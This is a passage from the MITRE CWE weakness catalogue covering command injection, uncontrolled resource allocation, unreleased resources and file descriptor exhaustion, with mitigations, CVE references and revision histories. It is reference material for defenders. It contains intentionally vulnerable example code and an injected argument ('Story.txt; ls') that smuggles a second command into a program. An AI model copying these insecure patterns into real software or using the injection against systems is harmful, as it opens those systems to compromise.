as well. - - - The following code from a system utility uses the system property APPHOME to determine the directory in which it is installed and then executes an initialization script based on a relative path from the specified directory. - - ...String home = System.getProperty("APPHOME");String cmd = home + INITCMD;java.lang.Runtime.getRuntime().exec(cmd);... - - The code above allows an attacker to execute arbitrary commands with the elevated privilege of the application by modifying the system property APPHOME to point to a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, if an attacker can control the value of the system property APPHOME, then they can fool the application into running malicious code and take control of the system. - - - The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable: - - #include <stdio.h>#include <unistd.h> - int main(int argc, char **argv) { - - char cat[] = "cat ";char *command;size_t commandLength; - commandLength = strlen(cat) + strlen(argv[1]) + 1;command = (char *) malloc(commandLength);strncpy(command, cat, commandLength);strncat(command, argv[1], (commandLength - strlen(cat)) ); - system(command);return (0); - } - - Used normally, the output is simply the contents of the file requested: - - $ ./catWrapper Story.txtWhen last we left our heroes... - - However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint: - - $ ./catWrapper Story.txt; lsWhen last we left our heroes...Story.txtSensitiveFile.txtPrivateData.dba.out* - - If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege. - - - - - CVE-1999-0067 - Canonical example of OS command injection. CGI program does not neutralize "|" metacharacter when invoking a phonebook program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067 - - - CVE-2019-12921 - image program allows injection of commands in "Magick Vector Graphics (MVG)" language. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12921 - - - CVE-2020-11698 - anti-spam product allows injection of SNMP commands into confiuration file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698 - - - - - Command Injection - - - Command injection - - - A2 - Injection Flaws - CWE More Specific - - - A1 - Unvalidated Input - CWE More Specific - - - A6 - Injection Flaws - CWE More Specific - - - SFP24 - Tainted input to command - - - IDS34-PL - Do not pass untrusted, unsanitized data to a command interpreter - CWE More Specific - - - - - - - - - - - - - - - - - - - - The "command injection" phrase carries different meanings to different people. For some people, it refers to refers to any type of attack that can allow the attacker to execute commands of their own choosing, regardless of how those commands are inserted. The command injection could thus be resultant from another weakness. This usage also includes cases in which the functionality allows the user to specify an entire command, which is then executed; within CWE, this situation might be better regarded as an authorization problem (since an attacker should not be able to specify arbitrary commands.) - Another common usage, which includes CWE-77 and its descendants, involves cases in which the attacker injects separators into the command being constructed. - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes, Terminology_Notes - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Description, Observed_Examples, Relationships - - Command Injection - Failure to Sanitize Data into a Control Plane (aka 'Command Injection') - Failure to Sanitize Data into a Control Plane ('Command Injection') - Improper Sanitization of Special Elements used in a Command ('Command Injection') - - - - The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor. - Code frequently has to work with limited resources, so programmers must be careful to ensure that resources are not consumed too quickly, or too easily. Without use of quotas, resource limits, or other protection mechanisms, it can be easy for an attacker to consume many resources by rapidly making many requests, or causing larger resources to be used than is needed. When too many resources are allocated, or if a single resource is too large, then it can prevent the code from working correctly, possibly leading to a denial of service. - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Operation - - - System Configuration - - - High - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource. - - - - - Manual Static Analysis - Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all. - - - Fuzzing - - While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause. - When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness. - - Opportunistic - - - Automated Dynamic Analysis - Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. Manual analysis is likely required to interpret the results. - - - Automated Static Analysis - - Specialized configuration or tuning may be required to train automated tools to recognize this weakness. - Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value. - Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day. - - - - - - Requirements - Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits. - - - Architecture and Design - Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410. - - - Architecture and Design - Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - This will only be applicable to cases where user input can influence the size or frequency of resource allocations. - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Architecture and Design - - Mitigation of resource exhaustion attacks requires that the target system either: - - - recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays - uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed. - - - The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question. - The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker. - - - - Architecture and Design - Ensure that protocols have specific limits of scale placed on them. - - - Architecture and Design - Implementation - - If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery. - Ensure that all failures in resource allocation place the system into a safe posture. - - - - Operation - Architecture and Design - Resource Limitation - - Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. - When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. - Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). - - - - - - This code allocates a socket and forks each time it receives a new connection. - - sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {newsock=accept(sock, ...);printf("A connection has been accepted\n");pid = fork();} - - The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely. - - - In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket. - - int writeDataFromSocketToFile(char *host, int port){ - - char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port); - if (socket < 0) {printf("Unable to open socket connection");return(FAIL);}if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) { - if (openFileToWrite(filename) > 0) { - while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){if (!(writeToFile(buffer) > 0))break; - } - }closeFile(); - }closeSocket(socket); - } - - This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients' ability to access the service. - - - In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array. - - - - /* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */ - int processMessage(char **message){ - char *body; - int length = getMessageLength(message[0]); - if (length > 0) {body = &message[1][0];processMessageBody(body);return(SUCCESS);}else {printf("Unable to process message; invalid message length");return(FAIL);} - } - - This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check - Also, consider changing the type from 'int' to 'unsigned int', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code. - - unsigned int length = getMessageLength(message[0]);if ((length > 0) && (length < MAX_LENGTH)) {...} - - - - In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket. - - public void acceptConnections() { - - try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);t.start();}serverSocket.close(); - - } catch (IOException ex) {...} - } - - In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources. - The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated. - - public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;... - public void acceptConnections() { - - try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);}serverSocket.close(); - - } catch (IOException ex) {...} - } - - - - An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased. - - - - - - Here the problem is that every time a connection is made, more memory is allocated. So if one just opened up more and more connections, eventually the machine would run out of memory. - - bar connection() {foo = malloc(1024);return foo;}endConnection(bar foo) {free(foo);}int main() {while(1) {foo=connection();}endConnection(foo)} - - - - - - CVE-2009-4017 - Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts.. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017 - - - CVE-2009-2726 - Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726 - - - CVE-2009-2540 - Large integer value for a length property in an object causes a large amount of memory allocation. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540 - - - CVE-2009-2054 - Product allows exhaustion of file descriptors when processing a large number of TCP packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054 - - - CVE-2008-5180 - Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180 - - - CVE-2008-1700 - Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700 - - - CVE-2005-4650 - CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4650 - - - CVE-2020-15100 - web application scanner attempts to read an excessively large file created by a user, causing process termination - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15100 - - - - - FIO04-J - Close resources when they are no longer needed - - - SER12-J - Avoid memory and resource leaks during serialization - - - MSC05-J - Do not exhaust heap space - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - This entry is different from uncontrolled resource consumption (CWE-400) in that there are other weaknesses that are related to inability to control resource consumption, such as holding on to a resource too long after use, or not correctly keeping track of active resources so that they can be managed and released when they are finished (CWE-771). - Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place. - - - - CWE Content Team - MITRE - 2009-05-13 - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Demonstrative_Examples, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Applicable_Platforms, Description, Maintenance_Notes, Potential_Mitigations, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The software does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed. - This does not necessarily apply in languages or frameworks that automatically perform garbage collection, since the removal of all references may act as a signal that the resource is ready to be reclaimed. - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Availability - DoS: Resource Consumption (Other) - An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource. - - - - - Operation - Architecture and Design - Resource Limitation - - Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. - When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. - Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). - - - - - - FIO42-C - Close files when they are no longer needed - CWE More Abstract - - - MEM31-C - Free dynamically allocated memory when no longer needed - CWE More Abstract - - - - - CWE Content Team - MITRE - 2009-05-13 - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, Maintenance_Notes, Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - - - - The software does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed. - When a resource is not released after use, it can allow attackers to cause a denial of service by causing the allocation of resources without triggering their release. Frequently-affected resources include memory, CPU, disk space, power or battery, etc. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Availability - DoS: Resource Consumption (Other) - An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource. - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated. - - - - Implementation - It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free resources in a function. If you allocate resources that you intend to free upon completion of the function, you must be sure to free the resources at all exit points for that function including error conditions. - - - Operation - Architecture and Design - Resource Limitation - - Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. - When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. - Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). - - - - - - The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called. - - private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}} - - The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure. - - private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}fil.Close();} - - - - The following code attempts to open a new connection to a database, process the results returned by the database, and close the allocated SqlConnection object. - - SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close(); - - The problem with the above code is that if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries. - - - This code attempts to open a connection to a database and catches any exceptions that may occur. - - try {Connection con = DriverManager.getConnection(some_connection_string);}catch ( Exception e ) {log( e );} - - If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application. - - - Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries. - - ...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();... - - - - The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles. - - int decodeFile(char* fName) { - char buf[BUF_SZ];FILE* f = fopen(fName, "r");if (!f) {printf("cannot open %s\n", fName);return DECODE_FAIL;}else { - while (fgets(buf, BUF_SZ, f)) {if (!checkChecksum(buf)) {return DECODE_FAIL;}else {decodeBlock(buf);}} - }fclose(f);return DECODE_SUCCESS; - } - - - - - - CVE-2007-0897 - Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897 - - - CVE-2001-0830 - Sockets not properly closed when attacker repeatedly connects and disconnects from server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830 - - - CVE-1999-1127 - Does not shut down named pipe connections if malformed data is sent. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127 - - - CVE-2009-2858 - Chain: memory leak (CWE-404) leads to resource exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858 - - - CVE-2009-2054 - Product allows exhaustion of file descriptors when processing a large number of TCP packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054 - - - CVE-2008-2122 - Port scan triggers CPU consumption with processes that attempt to read data from closed sockets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122 - - - CVE-2007-4103 - Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103 - - - CVE-2002-1372 - Return values of file/socket operations not checked, allowing resultant consumption of file descriptors. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372 - - - - - FIO42-C - Close files when they are no longer needed - CWE More Abstract - - - MEM31-C - Free dynamically allocated memory when no longer needed - CWE More Abstract - - - ASCSM-CWE-772 - - - ASCRM-CWE-772 - - - - - - - - - - - "Resource exhaustion" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain. - Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place. - - - - CWE Content Team - MITRE - 2009-05-13 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed. - This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations. - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Resource Consumption (Other) - An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource. - - - - - Operation - Architecture and Design - Resource Limitation - - Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. - When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. - Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). - - - - - - FIO42-C - Close files when they are no longer needed - CWE More Abstract - - - - - CWE Content Team - MITRE - 2009-05-13 - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - - - - The software allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor. - This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations. - - - - - - File Descriptor Exhaustion - - - - - Architecture and Design - - - Implementation - - - Low - - - Availability - DoS: Resource Consumption (Other) - When allocating resources without limits, an attacker could prevent all other 